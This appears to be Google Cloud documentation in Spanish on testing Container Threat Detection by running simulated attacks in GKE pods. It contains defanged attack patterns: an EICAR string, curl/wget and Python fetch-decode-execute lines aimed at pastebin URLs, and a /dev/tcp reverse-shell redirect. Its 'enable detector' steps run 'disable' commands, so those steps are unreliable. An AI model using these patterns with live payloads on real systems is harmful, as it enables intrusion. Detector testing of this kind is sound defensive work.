En esta página, se explica cómo verificar que Container Threat Detection funcione. Para ello, activa de forma intencional los detectores y verifica de los resultados. La detección de amenazas a contenedores es un servicio integrado de los niveles Premium y Enterprise de Security Command Center. Para ver los resultados de Container Threat Detection, debe estar habilitada en la configuración de Servicios del Security Command Center.
Antes de comenzar
Para detectar amenazas potenciales a tus contenedores, debes asegurarte de que tus clústeres estén en una versión compatible de Google Kubernetes Engine (GKE). Para obtener más información, consulta Usa una versión de GKE compatible.
Habilita los detectores
Los detectores Added Binary Executed y Added Library Loaded están inhabilitados de forma predeterminada. Para probar esos detectores, debes habilitarlos de forma explícita:
Verifica el estado del detector:
export PROJECT=PROJECT_ID gcloud alpha scc settings services describe \ --service=CONTAINER_THREAT_DETECTION \ --project=${PROJECT}Habilita el detector
Added Binary Executed:gcloud alpha scc settings services modules disable \ --service=CONTAINER_THREAT_DETECTION \ --module=ADDED_BINARY_EXECUTED \ --project=${PROJECT}Habilita el detector
Added Library Loaded:gcloud alpha scc settings services modules disable \ --service=CONTAINER_THREAT_DETECTION \ --module=ADDED_LIBRARY_LOADED \ --project=${PROJECT}
Configura variables de entorno
Para probar los detectores, usa la consola de Google Cloud y Cloud Shell. Puedes establecer variables de entorno en Cloud Shell para facilitar la ejecución de los comandos. Las siguientes variables se usan para probar todos los detectores de la detección de amenazas a contenedores.
Ve a la consola de Google Cloud.
Ve a la consola de Google Cloud.
Selecciona el proyecto que contiene el contenedor que deseas usar para probar.
Haz clic en Activate Cloud Shell (Activar Cloud Shell).
En Cloud Shell, configura las variables de entorno:
La zona en la que se encuentra tu clúster:
export ZONE=CLUSTER_ZONEEl proyecto en el que se encuentra tu contenedor:
export PROJECT=PROJECT_IDEl nombre del clúster:
export CLUSTER_NAME=CLUSTER_NAME
Se establecen las variables. En las siguientes secciones, se incluyen instrucciones para probar los detectores de amenazas de contenedores.
Se ejecutó el objeto binario agregado
Para activar un resultado binario agregado, descarta un objeto binario en tu contenedor y ejecútalo. En este ejemplo, se implementa la última imagen de Ubuntu 24.04, se copia /bin/ls en otra ubicación y, luego, se la ejecuta. La ejecución del objeto binario es inesperada porque la copia del objeto binario no era parte de la imagen del contenedor original, incluso cuando esa imagen está en Ubuntu 24.04, y los contenedores están destinados a ser inmutables.
Usa Cloud Shell para acceder al plano de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTSuelta un objeto binario y ejecútalo:
Nodo x86:
tag="ktd-test-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- sh -c "cp /bin/ls /tmp/$tag; /tmp/$tag"Nodo ARM:
tag="ktd-test-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- sh -c "cp /bin/ls /tmp/$tag; /tmp/$tag"
En este procedimiento de prueba, se debería crear un hallazgo ejecutado de objeto binario agregado que se puede ver en Security Command Center, y en Cloud Logging si configuraste Logging para Container Threat Detection. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center.
Para reducir el ruido, cuando creas un contenedor por primera vez, Container Threat Detection filtra temporalmente los resultados de binario agregado. Para ver todos los resultados de la ejecución de objetos binarios agregados mientras se configura un contenedor, agrega el prefijo ktd-test al nombre del contenedor o del pod, como en el ejemplo.
Se cargó la biblioteca agregada
Para activar un resultado de carga de la biblioteca agregada, descarta una biblioteca en tu contenedor y, luego, cárgala. En este ejemplo, se implementa la última imagen de Ubuntu 24.04, se copia /lib/x86_64-linux-gnu/libc.so.6 en otra ubicación y, luego, se carga con ld. La biblioteca cargada es inesperada porque la copia de la biblioteca no formaba parte de la imagen del contenedor original, incluso si esa imagen está en Ubuntu 24.04, y los contenedores están destinados a ser inmutables.
Usa Cloud Shell para acceder al plan de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTDescarta una biblioteca y usa
ldpara cargarla:Nodo x86:
tag="ktd-test-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- sh -c \ "cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/$tag; /lib64/ld-linux-x86-64.so.2 /tmp/$tag"Nodo ARM:
tag="ktd-test-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- sh -c \ "cp /lib/aarch64-linux-gnu/libc.so.6 /tmp/$tag; /lib/ld-linux-aarch64.so.1 /tmp/$tag"
En este procedimiento de prueba, se debería crear una biblioteca agregada cargada que puedes ver en Security Command Center y en Cloud Logging si configuraste Logging para Container Threat Detection. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Empresarial de Security Command Center a nivel de la organización.
Para reducir el ruido, cuando creas un contenedor por primera vez, la detección de amenazas a contenedores filtra temporalmente los resultados de carga de bibliotecas agregadas. Para ver todos los resultados de carga de la biblioteca agregada mientras se configura un contenedor, agrega el prefijo ktd-test al nombre del contenedor o del pod, como en el ejemplo.
Ejecución: Se agregó el ejecutable binario malicioso
Para activar un resultado de ejecución: Se agregó el ejecutable binario malicioso, descarta un objeto binario malicioso en tu contenedor y ejecútalo. En este ejemplo, se implementa la imagen más reciente de Ubuntu 24.04, se crea un archivo malicioso simulado y, luego, se ejecuta. La ejecución del objeto binario es inesperada porque el objeto binario malicioso simulado no formaba parte de la imagen del contenedor original, y el objeto binario es un archivo de prueba EICAR, un archivo que la inteligencia de amenazas clasifica como malicioso.
Usa Cloud Shell para acceder al plano de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTSuelta el objeto binario EICAR y ejecútalo:
Nodo x86:
tag="ktd-test-added-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- sh -c \ "touch /tmp/test_mal_file; echo -n '$eicar' > /tmp/test_mal_file; chmod 700 /tmp/test_mal_file; /tmp/test_mal_file; sleep 10"Nodo ARM:
tag="ktd-test-added-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- sh -c \ "touch /tmp/test_mal_file; echo -n '$eicar' > /tmp/test_mal_file; chmod 700 /tmp/test_mal_file; /tmp/test_mal_file; sleep 10"
En este procedimiento de prueba, se debería crear un hallazgo de ejecución: Se ejecutó un objeto binario malicioso agregado que puedes ver en Security Command Center y en Cloud Logging si configuraste Logging para la detección de amenazas a contenedores. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center.
Para reducir el ruido, cuando creas un contenedor por primera vez, Container Threat Detection filtra temporalmente los resultados de Execution: Added Malicious Binary Executed. Para ver todos los resultados de Ejecución: Se agregó un objeto binario malicioso ejecutado mientras se configura un contenedor, agrega el prefijo ktd-test al nombre del contenedor o del pod, como en el ejemplo.
Ejecución: Escape de contenedor
Para activar un resultado de ejecución: Escape de contenedor, coloca un objeto binario en tu contenedor y ejecútalo. En este ejemplo, se implementa la última imagen de Ubuntu 24.04, se copia /bin/ls en otra ubicación, se le cambia el nombre a una herramienta sospechosa (botb-linux-amd64) y se ejecuta con argumentos adicionales. Esta acción se considera sospechosa porque esta ejecución simula un comportamiento coherente con un intento de escape de contenedor.
Usa Cloud Shell para acceder al plano de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTSuelta un objeto binario de la herramienta de explotación de contenedores, como
botb-linux-amd64, y ejecútalo:Nodo x86:
tag="ktd-test-container-escape-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- bash -c \ "cp /bin/ls /tmp/botb-linux-amd64; /tmp/botb-linux-amd64 -autopwn"Nodo ARM:
tag="ktd-test-container-escape-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- bash -c \ "cp /bin/ls /tmp/botb-linux-arm64; /tmp/botb-linux-arm64 -autopwn"
En este procedimiento de prueba, se debería crear un resultado de ejecución: Escape de contenedor que puedes ver en Security Command Center y en Cloud Logging si configuraste Logging para la detección de amenazas a contenedores. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center.
Para reducir el ruido, cuando creas un contenedor por primera vez, es posible que la Detección de amenazas de contenedores
filtre temporalmente los resultados de Ejecución: Escape de contenedor. Para ver todos los resultados de Execution: Container Escape mientras se configura un contenedor, antepone ktd-test al nombre del contenedor o del pod, como en el ejemplo.
Ejecución: Ejecución de la herramienta de ataque de Kubernetes
Para activar un resultado de ejecución: ejecución de herramienta de ataque de Kubernetes, coloca un objeto binario en tu contenedor y ejecútalo. En este ejemplo, se implementa la última imagen de Ubuntu 24.04, se copia /bin/ls en otra ubicación, se le cambia el nombre a una herramienta sospechosa (amicontained) y se ejecuta. Esta acción se considera sospechosa porque simula un comportamiento coherente con un posible intento de ejecución de una herramienta de ataque de Kubernetes.
Usa Cloud Shell para acceder al plano de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTSuelta un objeto binario de la herramienta de ataque de Kubernetes, como
amicontained, y ejecútalo:Nodo x86:
tag="ktd-test-kubernetes-attack-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- bash -c \ "cp /bin/ls /tmp/amicontained; /tmp/amicontained"Nodo ARM:
tag="ktd-test-kubernetes-attack-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- bash -c \ "cp /bin/ls /tmp/amicontained; /tmp/amicontained"
Este procedimiento de prueba debería crear un resultado de ejecución: ejecución de herramienta de ataque de Kubernetes que puedes ver en Security Command Center y en Cloud Logging si configuraste Logging para la detección de amenazas a contenedores. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center.
Para reducir el ruido, cuando creas un contenedor por primera vez, es posible que Container Threat Detection
filtre temporalmente los resultados de Execution: Kubernetes Attack Tool Execution.
Para ver todos los resultados de Execution: Kubernetes Attack Tool Execution mientras se configura un contenedor, prefija el nombre del contenedor o del pod con ktd-test, como en el ejemplo.
Ejecución: Ejecución de la herramienta de reconocimiento local
Para activar un resultado de ejecución: ejecución de herramienta de reconocimiento local, coloca un objeto binario en tu contenedor y ejecútalo. En este ejemplo, se implementa la última imagen de Ubuntu 24.04, se copia /bin/ls en otra ubicación, se le cambia el nombre a una herramienta sospechosa (linenum.sh) y se ejecuta. Esta acción se considera sospechosa porque ejecutar el binario con el nombre cambiado simula un comportamiento coherente con un intento de reconocimiento local.
Usa Cloud Shell para acceder al plano de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTSuelta un objeto binario de la herramienta de reconocimiento local, como
linenum.sh, y ejecútalo:Nodo x86:
tag="ktd-test-local-reconn-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- bash -c \ "cp /bin/ls /tmp/linenum.sh; /tmp/linenum.sh"Nodo ARM:
tag="ktd-test-local-reconn-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- bash -c \ "cp /bin/ls /tmp/linenum.sh; /tmp/linenum.sh"
Este procedimiento de prueba debería crear un resultado de ejecución: ejecución de la herramienta de reconocimiento local que puedes ver en Security Command Center y en Cloud Logging si configuraste Logging para la detección de amenazas a contenedores. La visualización de resultados en Cloud Logging solo está disponible si activa el nivel Premium o Enterprise de Security Command Center.
Para reducir el ruido, cuando creas un contenedor por primera vez, es posible que la Detección de amenazas a contenedores
filtre temporalmente los resultados de Execution: Local Reconnaissance Tool Execution. Para ver todos los resultados de Execution: Local Reconnaissance Tool Execution mientras se configura un contenedor, agrega el prefijo ktd-test al nombre del contenedor o del pod, como en el ejemplo.
Execution: Malicious Python executed
Para activar un resultado Execution: Malicious Python executed, puedes ejecutar Python en el siguiente procedimiento en tu contenedor.
El procedimiento implementa la imagen de Python más reciente, copia el código de Python que parece malicioso y, luego, lo ejecuta. Para activar una detección, el código de Python debe parecer malicioso para el detector.
Usa Cloud Shell para acceder al plan de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTEjecuta la siguiente secuencia de comandos en un contenedor nuevo.
Este código de Python se originó en un honeypot. Sin embargo, se modificó para que no ejecute el objeto binario malicioso. Ejecutar la secuencia de comandos no generará actividad maliciosa en tu contenedor. El objeto binario en la URL a la que se hace referencia no existe, y si intentas seguirla, se produce un error 404. Esta situación es esperable. El intento de descargar, decodificar y ejecutar un objeto binario con una secuencia de comandos intercalada es lo que activa la detección.
Nodo x86:
tag="ktd-test-malicious-python-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/python:latest \ "$tag" -- python -c "import urllib import base64 import os url = 'https://pastebin.com/raw/Z' page = base64.b64decode(urllib.urlopen(url).read()) page = '' f = os.popen(str(page)) url = 'https://pastebin.com/raw/Z' d = 'https://pastebin.com/raw/Z' page = base64.b64decode(urllib.urlopen(url).read()) page = '' exec(page)"Nodo ARM:
tag="ktd-test-malicious-python-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image python:3-buster \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- python -c "import urllib import base64 import os url = 'https://pastebin.com/raw/Z' page = base64.b64decode(urllib.urlopen(url).read()) page = '' f = os.popen(str(page)) url = 'https://pastebin.com/raw/Z' d = 'https://pastebin.com/raw/Z' page = base64.b64decode(urllib.urlopen(url).read()) page = '' exec(page)"
Este procedimiento de prueba crea un hallazgo de Execution: Malicious Python executed que puedes ver en Security Command Center y en Cloud Logging si configuraste el registro para Container Threat Detection. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center.
Ejecución: Se ejecutó un objeto binario malicioso modificado
Para activar un resultado de ejecución: Se ejecutó un objeto binario malicioso modificado, modifica un objeto binario malicioso en tu contenedor y ejecútalo. En este ejemplo, se implementa la imagen más reciente de Ubuntu 24.04, se modifica /bin/ls a un archivo malicioso de prueba EICAR y, luego, se ejecuta. La ejecución del objeto binario es
inesperada porque el /bin/ls creado se modifica durante el tiempo de ejecución del contenedor como
un objeto binario malicioso de prueba de EICAR, y el objeto binario de EICAR es un archivo malicioso conocido
según la inteligencia de amenazas.
Usa Cloud Shell para acceder al plano de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTSuelta el objeto binario EICAR y ejecútalo:
Nodo x86:
tag="ktd-test-modified-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- sh -c "echo -n '$eicar' > /bin/ls; /bin/ls; sleep 10"Nodo ARM:
tag="ktd-test-modified-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- sh -c "echo -n '$eicar' > /bin/ls; /bin/ls; sleep 10"
En este procedimiento de prueba, se debería crear un hallazgo de ejecución: objeto binario malicioso modificado que se puede ver en Security Command Center y en Cloud Logging si configuraste Logging para Container Threat Detection. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center.
Para reducir el ruido, cuando creas un contenedor por primera vez, Container Threat Detection filtra temporalmente los resultados de Ejecución: Objeto binario malicioso modificado ejecutado. Para ver todos los resultados de Ejecución: Objeto binario malicioso modificado ejecutado mientras se configura un contenedor, agrega el prefijo ktd-test al nombre del contenedor o del pod, como en el ejemplo.
Secuencia de comandos maliciosa ejecutada
Para activar el resultado "Secuencia de comandos maliciosa ejecutada", puedes ejecutar la secuencia de comandos en el siguiente procedimiento en tu contenedor.
El procedimiento implementa la última imagen de Ubuntu 24.04, copia una secuencia de comandos que parece maliciosa y, luego, la ejecuta. Para activar una detección, una secuencia de comandos debe parecer maliciosa para el detector.
Usa Cloud Shell para acceder al plan de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTEjecuta la siguiente secuencia de comandos en un contenedor nuevo.
Esta secuencia de comandos de shell de Bourne intercalada se originó en un honeypot. Sin embargo, se modificó para que no ejecute el binario malicioso, por lo que ejecutar la secuencia de comandos no generará actividad maliciosa en tu contenedor. Es posible que se haya quitado el objeto binario de la URL a la que se hace referencia, y si intentas seguirla, se mostrará un error 404. Esta situación es esperable. El intento de descargar, decodificar y ejecutar un objeto binario con una secuencia de comandos intercalada es lo que activa la detección.
Nodo x86:
tag="ktd-test-malicious-script-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- sh -c \ "(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"Nodo ARM:
tag="ktd-test-malicious-script-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- sh -c \ "(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"
Este procedimiento de prueba crea un resultado ejecutado de secuencias de comandos maliciosas que puedes ver en Security Command Center y en Cloud Logging si configuraste el registro para Container Threat Detection. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center.
Se detectó una URL maliciosa
Para activar el resultado "URL maliciosa observada", ejecuta un objeto binario y proporciona una URL maliciosa como argumento.
En el siguiente ejemplo, se implementa una imagen de Ubuntu 24.04 y se ejecuta /bin/curl para acceder a una URL de software malicioso de muestra desde el servicio de Navegación segura.
Usa Cloud Shell para acceder al plan de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTEjecuta
curly proporciona una URL maliciosa como argumento:Nodo x86:
tag="ktd-test-malicious-url-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" url="https://testsafebrowsing.appspot.com/s/malware.html" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- sh -c "apt update; apt --yes install curl; curl $url | cat"Nodo ARM:
tag="ktd-test-malicious-url-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" url="https://testsafebrowsing.appspot.com/s/malware.html" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- sh -c "apt update; apt --yes install curl; curl $url | cat"
Este procedimiento de prueba activa un hallazgo de URL maliciosa observada que puedes ver en Security Command Center y, si configuraste Logging para Container Threat Detection, en Cloud Logging. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center a nivel de la organización.
Shells inversas
Para activar un resultado de shell inverso, inicia un objeto binario con redireccionamiento stdin a un socket conectado a TCP. En este ejemplo, se copia /bin/echo en /tmp/sh y, luego, se inicia /tmp/sh con redireccionamiento al DNS público de Google
8.8.8.8 en el puerto DNS. No se imprime nada cuando ejecutas este ejemplo. Para evitar cualquier inyección de código externo a través de un ataque de intermediarios (MITM), este ejemplo no usa el objeto binario /bin/sh.
Usa Cloud Shell para acceder al plan de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTInicia un objeto binario con el redireccionamiento
/bin/echopara el DNS público de Google:Nodo x86:
tag="ktd-test-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ "$tag" -- bash -c \ "cp /bin/echo /tmp/sh; /tmp/sh >& /dev/tcp/8.8.8.8/53 0>&1"Nodo ARM:
tag="ktd-test-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -i \ --image marketplace.gcr.io/google/ubuntu2404:latest \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" -- bash -c \ "cp /bin/echo /tmp/sh; /tmp/sh >& /dev/tcp/8.8.8.8/53 0>&1"
Esto debería crear una búsqueda de shell inversa que puedes ver en Security Command Center y en Cloud Logging si configuraste Logging para Container Threat Detection. La visualización de resultados en Cloud Logging solo está disponible si activas el nivel Premium o Enterprise de Security Command Center a nivel de la organización.
Shell secundario inesperado
Para probar el detector Unexpected Child Shell, puedes crear un árbol de procesos que incluya un proceso de shell secundario.
En el siguiente ejemplo, se crea un árbol de procesos consul->dash, que puede detectar el detector Unexpected Child Shell. Esta prueba es segura porque solo usa objetos binarios integrados. En este ejemplo, se realizan las acciones siguientes:
- Crea una copia del proceso
shy asígnale el nombreconsul. - Copia el proceso
echoy le asigna el nombredash. - Invoca el proceso
dashcopiado en el procesoconsulcopiado.
Para activar un hallazgo de Unexpected Child Shell, haz lo siguiente:
Usa Cloud Shell para acceder al plano de control del clúster:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECTUsa el proceso de
consulsimulado para invocar un shell simulado:Nodo x86:
tag="ktd-test-unexpected-child-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -ti \ --image ubuntu "$tag" --command -- /bin/sh -c \ 'cp /bin/sh /tmp/consul; cp /bin/echo /tmp/sh; \ /tmp/consul -c "/tmp/sh child ran successfully & wait"'Nodo ARM:
tag="ktd-test-unexpected-child-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run \ --restart=Never \ --rm=true -ti \ --image ubuntu \ --overrides='{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}' \ "$tag" --command -- /bin/sh -c \ 'cp /bin/sh /tmp/consul; cp /bin/echo /tmp/sh; \ /tmp/consul -c "/tmp/sh child ran successfully & wait"'
Este procedimiento de prueba crea un resultado Unexpected Child Shell que puedes ver en Security Command Center. Si Logging está configurado para la detección de amenazas a contenedores y tienes Security Command Center Premium o Enterprise activado a nivel de la organización, también puedes ver el resultado en Cloud Logging.
¿Qué sigue?
- Obtén más información para usar la detección de amenazas a contenedores.